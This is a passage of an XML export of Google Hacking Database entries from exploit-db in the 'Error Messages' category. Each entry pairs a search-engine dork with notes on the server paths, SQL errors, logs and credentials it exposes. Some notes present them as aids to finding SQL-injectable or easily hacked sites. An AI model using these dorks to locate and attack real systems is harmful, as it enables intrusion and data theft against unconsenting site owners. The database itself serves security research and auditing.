</entry>
<entry>
<id>727</id>
<link>https://www.exploit-db.com/ghdb/727</link>
<category>Error Messages</category>
<shortDescription>&quot;Warning: mysql_query()&quot; &quot;invalid query&quot;</shortDescription>
<textualDescription>MySQL query errors revealing database schema and usernames.</textualDescription>
<query>&quot;Warning: mysql_query()&quot; &quot;invalid query&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22Warning%3A+mysql_query%28%29%22+%22invalid+query%22</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>97</id>
<link>https://www.exploit-db.com/ghdb/97</link>
<category>Error Messages</category>
<shortDescription>&quot;Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL&quot;</shortDescription>
<textualDescription>This search reveals Postgresql servers in yet another way then we had seen before. Path information appears in the error message and sometimes database names.</textualDescription>
<query>&quot;Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Warning%3A+pg_connect%28%29%3A+Unable+to+connect+to+PostgreSQL+server%3A+FATAL%22</querystring>
<edb></edb>
<date>2004-08-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1133</id>
<link>https://www.exploit-db.com/ghdb/1133</link>
<category>Error Messages</category>
<shortDescription>&quot;Warning: Supplied argument is not a valid File-Handle resource in&quot;</shortDescription>
<textualDescription>This error message cqan reveal path information. This message (like other error messages) is often posted to help forums, although the message still reveals path info in this form. Consider using the site: operator to narrow search.</textualDescription>
<query>&quot;Warning: Supplied argument is not a valid File-Handle resource in&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Warning%3A+Supplied+argument+is+not+a+valid+File-Handle+resource+in%22+</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1342</id>
<link>https://www.exploit-db.com/ghdb/1342</link>
<category>Error Messages</category>
<shortDescription>&quot;Warning:&quot; &quot;failed to open stream: HTTP request failed&quot; &quot;on line&quot;</shortDescription>
<textualDescription>Just another error message.</textualDescription>
<query>&quot;Warning:&quot; &quot;failed to open stream: HTTP request failed&quot; &quot;on line&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Warning%3A%22+%22failed+to+open+stream%3A+HTTP+request+failed%22+%22on+line%22+</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1135</id>
<link>https://www.exploit-db.com/ghdb/1135</link>
<category>Error Messages</category>
<shortDescription>&quot;Warning:&quot; &quot;SAFE MODE Restriction in effect.&quot; &quot;The script whose uid is&quot; &quot;is not allowed to access owned by uid 0 in&quot; &quot;on line&quot;</shortDescription>
<textualDescription>This error message reveals full path information. Recommend use of site: operator to narrow searches.</textualDescription>
<query>&quot;Warning:&quot; &quot;SAFE MODE Restriction in effect.&quot; &quot;The script whose uid is&quot; &quot;is not allowed to access owned by uid 0 in&quot; &quot;on line&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Warning%3A%22+%22SAFE+MODE+Restriction+in+effect.%22+%22The+script+whose+uid+is%22+%22is+not+allowed+to+access+owned+by+uid+0+in%22+%22on+line%22</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3934</id>
<link>https://www.exploit-db.com/ghdb/3934</link>
<category>Error Messages</category>
<shortDescription>&quot;[function.getimagesize]: failed to open stream: No such file or directory in&quot;</shortDescription>
<textualDescription>Just another error that reveals full paths</textualDescription>
<query>&quot;[function.getimagesize]: failed to open stream: No such file or directory in&quot;</query>
<querystring>https://www.google.com/search?q=&quot;[function.getimagesize]: failed to open stream: No such file or directory in&quot;</querystring>
<edb></edb>
<date>2014-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>936</id>
<link>https://www.exploit-db.com/ghdb/936</link>
<category>Error Messages</category>
<shortDescription>&amp;quot;SQL Server Driver][SQL Server]Line 1: Incorrect syntax near&amp;quot;</shortDescription>
<textualDescription>you can find many servers infected with sql injection</textualDescription>
<query>&quot;[SQL Server Driver][SQL Server]Line 1: Incorrect syntax near&quot; -forum -thread -showthread</query>
<querystring>https://www.google.com/search?q=%22%5BSQL+Server+Driver%5D%5BSQL+Server%5DLine+1:+Incorrect+syntax+near%22+-forum+-thread+-showthread&amp;c2coff=1&amp;safe=off&amp;rls=org.mozilla:en-US:</querystring>
<edb></edb>
<date>2005-04-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>1433</id>
<link>https://www.exploit-db.com/ghdb/1433</link>
<category>Error Messages</category>
<shortDescription>allintext:&quot;fs-admin.php&quot;</shortDescription>
<textualDescription>A foothold using allintext:&quot;fs-admin.php&quot; shows the world readable directories of a plug-in that enables Wordpress to be used as a forum. Many of the results of the search also show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. There is also an undisclosed flaw in version 1.3 of the software, as the author has mentioned in version 1.4 as a security fix, but does not tell us what it is that was patched.
Author: DigiP</textualDescription>
<query>allintext:&quot;fs-admin.php&quot;</query>
<querystring>https://www.google.com/search?q=allintext%3A%22fs-admin.php%22&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-11</date>
<author>DigiP</author>
</entry>
<entry>
<id>93</id>
<link>https://www.exploit-db.com/ghdb/93</link>
<category>Error Messages</category>
<shortDescription>An unexpected token &quot;END-OF-STATEMENT&quot; was found</shortDescription>
<textualDescription>A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers...</textualDescription>
<query>An unexpected token &quot;END-OF-STATEMENT&quot; was found</query>
<querystring>https://www.google.com/search?q=An+unexpected+token+%22END-OF-STATEMENT%22+was+found</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5</id>
<link>https://www.exploit-db.com/ghdb/5</link>
<category>Error Messages</category>
<shortDescription>Coldfusion Error Pages</shortDescription>
<textualDescription>These aren't too horribly bad, but there are SO MANY of them. These sites got googlebotted while the site was having &quot;technical difficulties.&quot; The resulting cached error message gives lots of juicy tidbits about the target site.</textualDescription>
<query>&quot;Error Diagnostic Information&quot; intitle:&quot;Error Occurred While&quot;</query>
<querystring>https://www.google.com/search?q=%22Error+Diagnostic+Information%22+intitle%3A%22Error+Occurred+While%22+</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>125</id>
<link>https://www.exploit-db.com/ghdb/125</link>
<category>Error Messages</category>
<shortDescription>filetype:asp &quot;Custom Error Message&quot; Category Source</shortDescription>
<textualDescription>This is an ASP error message that can reveal information such as compiler used, language used, line numbers, program names and partial source code.</textualDescription>
<query>filetype:asp &quot;Custom Error Message&quot; Category Source</query>
<querystring>https://www.google.com/search?q=filetype:asp+%22Custom+Error+Message%22+Category+Source&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2004-03-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1274</id>
<link>https://www.exploit-db.com/ghdb/1274</link>
<category>Error Messages</category>
<shortDescription>filetype:asp + &quot;[ODBC SQL&quot;</shortDescription>
<textualDescription>This search returns more than just the one I saw already here. This one will return all ODBC SQL error pages including all data returned in the error. The information can range from simple data such as the table/row queried to full Database name etc.An attacker could take this information and use it to gain a foot hold into the SQL server and could use the information for an SQL injection attack.</textualDescription>
<query>filetype:asp + &quot;[ODBC SQL&quot;</query>
<querystring>https://www.google.com/search?safe=off&amp;as_qdr=all&amp;q=filetype%3Aasp++%2B+%22%5BODBC+SQL%22</querystring>
<edb></edb>
<date>2006-03-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>433</id>
<link>https://www.exploit-db.com/ghdb/433</link>
<category>Error Messages</category>
<shortDescription>filetype:log &quot;PHP Parse error&quot; | &quot;PHP Warning&quot; | &quot;PHP Error&quot;</shortDescription>
<textualDescription>This search will show an attacker some PHP error logs wich may contain information on wich an attack can be based.</textualDescription>
<query>filetype:log &quot;PHP Parse error&quot; | &quot;PHP Warning&quot; | &quot;PHP Error&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Alog+%22PHP+Parse+error%22+%7C+%22PHP+Warning%22+%7C+%22PHP+Error%22</querystring>
<edb></edb>
<date>2004-08-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>5225</id>
<link>https://www.exploit-db.com/ghdb/5225</link>
<category>Error Messages</category>
<shortDescription>filetype:php &quot;Notice: Undefined variable: data in&quot; -forum</shortDescription>
<textualDescription>Information Disclosure:
filetype:php &quot;Notice: Undefined variable: data in&quot; -forum
</textualDescription>
<query>filetype:php &quot;Notice: Undefined variable: data in&quot; -forum</query>
<querystring>https://www.google.com/search?q=filetype:php &quot;Notice: Undefined variable: data in&quot; -forum</querystring>
<edb></edb>
<date>2019-05-29</date>
<author>Dec0y</author>
</entry>
<entry>
<id>334</id>
<link>https://www.exploit-db.com/ghdb/334</link>
<category>Error Messages</category>
<shortDescription>filetype:php inurl:&quot;logging.php&quot; &quot;Discuz&quot; error</shortDescription>
<textualDescription>Discuz! Board error messages related to MySQL. The error message may be empty or contain path information or the offending SQL statement. All discuz! board errors seem to be logged by this php file.An attacker can use this to reveal parts of the database and possibly launch a SQL attack (by filtering this search including SELECT or INSERT statements).</textualDescription>
<query>filetype:php inurl:&quot;logging.php&quot; &quot;Discuz&quot; error</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Aphp+inurl%3A%22logging.php%22+%22Discuz%22+error</querystring>
<edb></edb>
<date>2004-07-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>297</id>
<link>https://www.exploit-db.com/ghdb/297</link>
<category>Error Messages</category>
<shortDescription>ht://Dig htsearch error</shortDescription>
<textualDescription>The ht://Dig system is a complete world wide web indexing and searching system for a domain or intranet. A list of publically available sites that use ht://Dig is available at http://www.htdig.org/uses.htmlht://Dig 3.1.1 - 3.2 has a directory traversal and file view vulnerability as described at http://www.securityfocus.com/bid/1026. Attackers can read arbitrary files on the system. If the system is not vulnerable, attackers can still use the error produced by this search to gather information such as administrative email, validation of a cgi-bin executable directory, directory structure, location of a search database file and possible naming conventions.</textualDescription>
<query>intitle:&quot;htsearch error&quot; ht://Dig error</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22htsearch+error%22+ht%3A%2F%2FDig+error</querystring>
<edb></edb>
<date>2004-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>66</id>
<link>https://www.exploit-db.com/ghdb/66</link>
<category>Error Messages</category>
<shortDescription>IIS 4.0 error messages</shortDescription>
<textualDescription>IIS 4.0 servers. Extrememly old, incredibly easy to hack...</textualDescription>
<query>intitle:&quot;the page cannot be found&quot; inetmgr</query>
<querystring>https://www.google.com/search?q=intitle%3A%22the+page+cannot+be+found%22+inetmgr</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>68</id>
<link>https://www.exploit-db.com/ghdb/68</link>
<category>Error Messages</category>
<shortDescription>IIS web server error messages</shortDescription>
<textualDescription>This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into...</textualDescription>
<query>intitle:&quot;the page cannot be found&quot; &quot;internet information services&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22the+page+cannot+be+found%22+%22internet+information+services%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>77</id>
<link>https://www.exploit-db.com/ghdb/77</link>
<category>Error Messages</category>
<shortDescription>Internal Server Error</shortDescription>
<textualDescription>This one shows the type of web server running on the site, and has the ability to show other information depending on how the message is internally formatted.</textualDescription>
<query>intitle:&quot;500 Internal Server Error&quot; &quot;server at&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22500+Internal+Server+Error%22+%22server+at%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>3930</id>
<link>https://www.exploit-db.com/ghdb/3930</link>
<category>Error Messages</category>
<shortDescription>intext:&quot;Access denied for&quot; intitle:&quot;Shopping cart&quot;</shortDescription>
<textualDescription>Here is a Dork I use in conjunction with sqlmap, for shopping carts with
MySQL
Error messages.
It got 80.000 results.
intext:&quot;Access denied for&quot; intitle:&quot;Shopping cart&quot;</textualDescription>
<query>intext:&quot;Access denied for&quot; intitle:&quot;Shopping cart&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Access denied for&quot; intitle:&quot;Shopping cart&quot;</querystring>
<edb></edb>
<date>2014-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>835</id>
<link>https://www.exploit-db.com/ghdb/835</link>
<category>Error Messages</category>
<shortDescription>intext:&quot;Error Message : Error loading required libraries.&quot;</shortDescription>
<textualDescription>This throws up pages which contain &quot;CGI ERROR&quot; reports - which include the file (and line number) of the errors occurence, the version of Perl being used, detailed server information (of the form &quot;Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.2 mod_perl/1.26&quot;), usernames, setup file names, form / query information, port and path information, etc.. perfect for system-profiling!</textualDescription>
<query>intext:&quot;Error Message : Error loading required libraries.&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Error+Message+%3A+Error+loading+required+libraries.%22</querystring>
<edb></edb>
<date>2005-01-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>6115</id>
<link>https://www.exploit-db.com/ghdb/6115</link>
<category>Error Messages</category>
<shortDescription>intext:&quot;Error Occurred While Processing Request&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Error Occurred While Processing Request&quot;
# Error messages.
# Date: 22/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Error Occurred While Processing Request&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Error Occurred While Processing Request&quot;</querystring>
<edb></edb>
<date>2020-05-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4301</id>
<link>https://www.exploit-db.com/ghdb/4301</link>
<category>Error Messages</category>
<shortDescription>intext:&quot;expects parameter 1 to be resource, boolean given&quot; filetype:php</shortDescription>
<textualDescription>intext:&quot;expects parameter 1 to be resource, boolean given&quot; filetype:php
Returns around 997,000 vulnerable mysql-based websites. </textualDescription>
<query>intext:&quot;expects parameter 1 to be resource, boolean given&quot; filetype:php</query>
<querystring>https://www.google.com/search?q=intext:&quot;expects parameter 1 to be resource, boolean given&quot; filetype:php</querystring>
<edb></edb>
<date>2016-06-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>3822</id>
<link>https://www.exploit-db.com/ghdb/3822</link>
<category>Error Messages</category>
<shortDescription>intext:&quot;Fatal error: Class 'Red_Action' not found in&quot;</shortDescription>
<textualDescription>Dork to find Plugin errors in wordpress websites
Dork - intext:&quot;Fatal error: Class 'Red_Action' not found in&quot; </textualDescription>
<query>intext:&quot;Fatal error: Class 'Red_Action' not found in&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Fatal error: Class 'Red_Action' not found in&quot;</querystring>
<edb></edb>
<date>2012-12-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>5765</id>
<link>https://www.exploit-db.com/ghdb/5765</link>
<category>Error Messages</category>
<shortDescription>intext:&quot;sf_app&quot; + &quot;frontend sf_app_base_cache_dir:&quot;</shortDescription>
<textualDescription>symfony exposed environemnt settings and credentials
navigate to settings or config
ex16x41
</textualDescription>
<query>intext:&quot;sf_app&quot; + &quot;frontend sf_app_base_cache_dir:&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;sf_app&quot; + &quot;frontend sf_app_base_cache_dir:&quot;</querystring>
<edb></edb>
<date>2020-03-04</date>
<author>ex16x41</author>
</entry>
<entry>
<id>4056</id>
<link>https://www.exploit-db.com/ghdb/4056</link>
<category>Error Messages</category>
<shortDescription>intext:&quot;Unexpected Problem Occurred!&quot; ext:aspx</shortDescription>
<textualDescription>This Error messages reveal a lot of info of servers. Enjoy xD.
Rootkit Pentester.</textualDescription>
<query>intext:&quot;Unexpected Problem Occurred!&quot; ext:aspx</query>
<querystring>https://www.google.com/search?q=intext:&quot;Unexpected Problem Occurred!&quot; ext:aspx</querystring>
<edb></edb>
<date>2015-08-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>309</id>
<link>https://www.exploit-db.com/ghdb/309</link>
<category>Error Messages</category>
<shortDescription>intext:&quot;Warning: Failed opening&quot; &quot;on line&quot; &quot;include_path&quot;</shortDescription>
<textualDescription>These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths.</textualDescription>
<query>intext:&quot;Warning: Failed opening&quot; &quot;on line&quot; &quot;include_path&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Warning%3A+Failed+opening%22+%22on+line%22+%22include_path%22</querystring>
<edb></edb>
<date>2004-07-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>5853</id>
<link>https://www.exploit-db.com/ghdb/5853</link>
<category>Error Messages</category>
<shortDescription>intext:&quot;\TCPDF\tcpdf.php on line 17778&quot; -stackoverflow -wordpress -github</shortDescription>
<textualDescription>#Author: MiningOmerta
#Google Dork that shows too much server information.
intext:&quot;\TCPDF\tcpdf.php on line 17778&quot; -stackoverflow -wordpress -github
</textualDescription>
<query>intext:&quot;TCPDFtcpdf.php on line 17778&quot; -stackoverflow -wordpress -github</query>
<querystring>https://www.google.com/search?q=intext:&quot;\TCPDF\tcpdf.php on line 17778&quot; -stackoverflow -wordpress -github</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>1368</id>
<link>https://www.exploit-db.com/ghdb/1368</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;Apache Tomcat&quot; &quot;Error Report&quot;</shortDescription>
<textualDescription>Apache Tomcat Error messages. These can reveal various kinds information depending on the type of error.</textualDescription>
<query>intitle:&quot;Apache Tomcat&quot; &quot;Error Report&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Apache+Tomcat%22+%22Error+Report%22</querystring>
<edb></edb>
<date>2006-06-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4522</id>
<link>https://www.exploit-db.com/ghdb/4522</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;CGIWrap Error&quot;</shortDescription>
<textualDescription>Finds CGIWrap script errors containing some interesting information!
Dxtroyer</textualDescription>
<query>intitle:&quot;CGIWrap Error&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;CGIWrap Error&quot;</querystring>
<edb></edb>
<date>2017-06-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>946</id>
<link>https://www.exploit-db.com/ghdb/946</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;Default PLESK Page&quot;</shortDescription>
<textualDescription>Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.The default page is an indication that no configuration has been done (yet) for the domain</textualDescription>
<query>intitle:&quot;Default PLESK Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Default%20PLESK%20Page%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-04-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4251</id>
<link>https://www.exploit-db.com/ghdb/4251</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;DSM Terminator [ ABORT ]&quot; | inurl:&quot;./com.sap.portal.dsm.Terminator&quot;</shortDescription>
<textualDescription>DSM Terminator Error
-Xploit </textualDescription>
<query>intitle:&quot;DSM Terminator [ ABORT ]&quot; | inurl:&quot;./com.sap.portal.dsm.Terminator&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;DSM Terminator [ ABORT ]&quot; | inurl:&quot;./com.sap.portal.dsm.Terminator&quot;</querystring>
<edb></edb>
<date>2016-04-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>5644</id>
<link>https://www.exploit-db.com/ghdb/5644</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;Error log for /LM/&quot;</shortDescription>
<textualDescription># Google Dork : intitle:&quot;Error log for /LM/&quot;
# Category : File contains Juicy items
# Date : 11-11-2019
# Author : Dhaiwat Mehta
</textualDescription>
<query>intitle:&quot;Error log for /LM/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Error log for /LM/&quot;</querystring>
<edb></edb>
<date>2019-11-11</date>
<author>Dhaiwat Mehta</author>
</entry>
<entry>
<id>296</id>
<link>https://www.exploit-db.com/ghdb/296</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;Error Occurred While Processing Request&quot; +WHERE (SELECT|INSERT) filetype:cfm</shortDescription>
<textualDescription>Cold fusion error messages logging the SQL SELECT or INSERT statements and the location of the .cfm file on the webserver.An attacker could use this information to quickly find SQL injection points.</textualDescription>
<query>intitle:&quot;Error Occurred While Processing Request&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22Error+Occurred+While+Processing+Request%22+%2BWHERE+%28SELECT%7CINSERT%29+filetype%3Acfm</querystring>
<edb></edb>
<date>2004-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>165</id>
<link>https://www.exploit-db.com/ghdb/165</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;Error Occurred&quot; &quot;The error occurred in&quot; filetype:cfm</shortDescription>
<textualDescription>This is a typical error message from ColdFusion. A good amount of information is available from an error message like this including lines of source code, full pathnames, SQL query info, database name, SQL state info and local time info.</textualDescription>
<query>intitle:&quot;Error Occurred&quot; &quot;The error occurred in&quot; filetype:cfm</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Error+Occurred%22+%22The+error+occurred+in%22+filetype%3Acfm</querystring>
<edb></edb>
<date>2004-04-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>287</id>
<link>https://www.exploit-db.com/ghdb/287</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;Error using Hypernews&quot; &quot;Server Software&quot;</shortDescription>
<textualDescription>HyperNews is a cross between the WWW and Usenet News. Readers can browse through the messages written by other people and reply to those messages. This search reveals the server software, server os, server account user:group (unix), and the server administrator email address. Many of these messages also include a traceback of the files and linenumbers and a listing of the cgi ENV variables. An attacker can use this information to prepare an attack either on the platform or the script files.</textualDescription>
<query>intitle:&quot;Error using Hypernews&quot; &quot;Server Software&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Error+using+Hypernews%22+%22Server+Software%22&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2004-06-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>185</id>
<link>https://www.exploit-db.com/ghdb/185</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;Execution of this script not permitted&quot;</shortDescription>
<textualDescription>This is a cgiwrap error message which displays admin name and email, port numbers, path names, and may also include optional information like phone numbers for support personnel.</textualDescription>
<query>intitle:&quot;Execution of this script not permitted&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Execution+of+this+script+not+permitted%22+Contact+phone</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6060</id>
<link>https://www.exploit-db.com/ghdb/6060</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;index of&quot; &quot;my-errors.log&quot; OR &quot;my-errors.logs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;my-errors.log&quot; OR &quot;my-errors.logs&quot;
# Juicy information including session IDs, user names, and more.
# Date: 7/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;my-errors.log&quot; OR &quot;my-errors.logs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;my-errors.log&quot; OR &quot;my-errors.logs&quot;</querystring>
<edb></edb>
<date>2020-05-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6112</id>
<link>https://www.exploit-db.com/ghdb/6112</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;index of&quot; &quot;stacktrace.log&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;stacktrace.log&quot;
Description: This google dork lists out sensitive stack trace details for
web servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;stacktrace.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;stacktrace.log&quot;</querystring>
<edb></edb>
<date>2020-05-21</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5963</id>
<link>https://www.exploit-db.com/ghdb/5963</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;index of&quot; errors.log</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; errors.log
Description: This Google dork lists out errors.log web server files for
websites
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; errors.log</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; errors.log</querystring>
<edb></edb>
<date>2020-04-29</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>4278</id>
<link>https://www.exploit-db.com/ghdb/4278</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;Struts Problem Report&quot; intext:&quot;development mode is enabled.&quot;</shortDescription>
<textualDescription>intitle:&quot;Struts Problem Report&quot; intext:&quot;development mode is
enabled.&quot;
about 51,600 apache struts apps in dev-mode.
pHr0ZZy </textualDescription>
<query>intitle:&quot;Struts Problem Report&quot; intext:&quot;development mode is enabled.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Struts Problem Report&quot; intext:&quot;development mode is enabled.&quot;</querystring>
<edb></edb>
<date>2016-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>106</id>
<link>https://www.exploit-db.com/ghdb/106</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;Under construction&quot; &quot;does not currently have&quot;</shortDescription>
<textualDescription>This error message can be used to narrow down the operating system and web server version which can be used by hackers to mount a specific attack.</textualDescription>
<query>intitle:&quot;Under construction&quot; &quot;does not currently have&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Under+construction%22+%22does+not+currently+have%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4078</id>
<link>https://www.exploit-db.com/ghdb/4078</link>
<category>Error Messages</category>
<shortDescription>intitle:&quot;Whoops! There was an error.&quot;</shortDescription>
<textualDescription>These error pages can contain database credentials.
contact: @geoffreyvdberge
</textualDescription>
<query>intitle:&quot;Whoops! There was an error.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Whoops! There was an error.&quot;</querystring>
<edb></edb>
<date>2015-09-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>667</id>
<link>https://www.exploit-db.com/ghdb/667</link>
<category>Error Messages</category>
<shortDescription>intitle:Configuration.File inurl:softcart.exe</shortDescription>
<textualDescription>This search finds configuration file errors within the softcart application. It includes the name of the configuration file and discloses server file paths.</textualDescription>
<query>intitle:Configuration.File inurl:softcart.exe</query>
<querystring>https://www.google.com/search?q=intitle%3AConfiguration.File+inurl%3Asoftcart.exe&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4081</id>
<link>https://www.exploit-db.com/ghdb/4081</link>
<category>Error Messages</category>
<shortDescription>intitle:Content Server Error IdcService=DOC_INFO</shortDescription>
<textualDescription>Oracle WebCenter Content
Content Server Error
-Xploit</textualDescription>
<query>intitle:Content Server Error IdcService=DOC_INFO</query>
<querystring>https://www.google.com/search?q=intitle:Content Server Error IdcService=DOC_INFO</querystring>
<edb></edb>
<date>2015-09-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4062</id>
<link>https://www.exploit-db.com/ghdb/4062</link>
<category>Error Messages</category>
<shortDescription>intitle:Error Page pageWrapper.jsp?</shortDescription>
<textualDescription>&quot;java.lang.NullPointerException&quot; Error
Thanks,
Xploit</textualDescription>
<query>intitle:Error Page pageWrapper.jsp?</query>
<querystring>https://www.google.com/search?q=intitle:Error Page pageWrapper.jsp?</querystring>
<edb></edb>
<date>2015-08-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4065</id>
<link>https://www.exploit-db.com/ghdb/4065</link>
<category>Error Messages</category>
<shortDescription>intitle:Error-javax.el.ELException+error+xhtml</shortDescription>
<textualDescription>An Error Occurred:
&quot;javax.el.ELException&quot;
Java error and gives
+ Stack Trace, + Component Tree, + Scoped Variables.
-Xploit</textualDescription>
<query>intitle:Error-javax.el.ELException+error+xhtml</query>
<querystring>https://www.google.com/search?q=intitle:Error-javax.el.ELException+error+xhtml</querystring>
<edb></edb>
<date>2015-08-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3785</id>
<link>https://www.exploit-db.com/ghdb/3785</link>
<category>Error Messages</category>
<shortDescription>inurl:&quot;*.php?*=*.php&quot; intext:&quot;Warning: include&quot; -inurl:.html -site:&quot;php.net&quot; -site:&quot;stackoverflow.com&quot; -inurl:&quot;*forums*&quot;</shortDescription>
<textualDescription>PHP Error Messages</textualDescription>
<query>inurl:&quot;*.php?*=*.php&quot; intext:&quot;Warning: include&quot; -inurl:.html -site:&quot;php.net&quot; -site:&quot;stackoverflow.com&quot; -inurl:&quot;*forums*&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;*.php?*=*.php&quot; intext:&quot;Warning: include&quot; -inurl:.html -site:&quot;php.net&quot; -site:&quot;stackoverflow.com&quot; -inurl:&quot;*forums*&quot;</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4557</id>
<link>https://www.exploit-db.com/ghdb/4557</link>
<category>Error Messages</category>
